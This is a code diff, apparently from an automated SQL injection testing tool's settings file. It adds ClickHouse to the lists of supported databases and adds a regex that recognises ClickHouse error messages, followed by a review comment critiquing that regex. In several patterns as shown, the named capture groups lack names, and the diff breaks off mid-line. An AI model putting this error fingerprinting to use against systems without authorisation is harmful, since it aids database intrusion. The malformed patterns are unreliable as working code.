+SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)
SUPPORTED_OS = ("linux", "windows")
-DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))
+DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
REFERER_ALIASES = ("ref", "referer", "referrer")
@@ -413,6 +415,7 @@
r"(?P[^\n>]{0,100}SQL Syntax[^\n<]+)",
r"(?s)Error Type:
(?P.+?)",
r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)",
+ r"Code: \d+. DB::Exception: (?P[^<>\n]*)",
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)",
r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)",
r"(?Pquery error: SELECT[^<>]+)"
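Review bot: In the added ClickHouse pattern the `.` after `\d+` is unescaped, so it matches any character rather than the literal full stop that follows the error code. `Code: \d+\. DB::Exception: ` is the stricter form. The capture uses `[^<>\n]*`, which also succeeds on an empty message, whereas the neighbouring patterns use `+`. Using `+` here would avoid reporting an empty error string.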
@@ -428,7 +431,7 @@
JAVASCRIPT_HREF_REGEX = r'